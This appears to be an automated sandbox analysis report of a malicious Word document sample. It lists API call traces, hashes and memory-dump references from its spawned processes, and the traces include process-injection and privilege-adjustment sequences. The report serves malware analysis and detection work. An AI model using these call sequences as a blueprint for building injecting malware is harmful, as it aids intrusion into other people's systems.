    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: cmd.exe Analysis ID: 51932

General

Root Process Name:d3d8sext.exe
Process MD5:AD7B9C14083B52BC532FBA5948342B98
Total matches:134
Initial Analysis Report:Open
Initial sample Analysis ID:51932
Initial sample SHA 256:059A6DDEEA6D6CEC2B3380F022785CF66E0FC5B40B9CAEB3E6B6032AB9B998B2
Initial sample name:HBControls_Request.doc

Similar Executed Functions

Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 01B33E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CD171, Relevance: 9.1, APIs: 6, Instructions: 67 Total matches: 31thread
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3D4D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 38registry
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
